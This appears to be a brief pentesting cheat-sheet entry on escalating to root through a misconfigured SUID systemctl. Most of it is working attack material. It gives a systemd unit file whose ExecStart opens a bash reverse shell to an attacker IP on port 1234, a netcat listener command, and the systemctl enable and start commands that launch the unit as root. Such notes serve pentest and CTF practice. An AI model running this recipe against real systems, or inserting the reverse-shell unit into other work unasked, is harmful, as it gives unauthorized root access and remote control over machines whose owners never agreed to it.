Systemctl
This Priv Esc is possible if systemctl is misconfigured by having SUID enabled
Create a systemd unit file
Created root.service
[Unit]
Description=rooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<YOUR IP>/1234 0>&1'
[Install]
WantedBy=multi-user.target
If required, transfer file to /tmp using wget and python to transfer file
Configure systemctl with custom sevice and start the service
Configure a netcat listener before starting service: nc -nlvp 1234
$ /bin/systemctl enable /tmp/root.service
$ /bin/systemctl start root
References
Last updated
Was this helpful?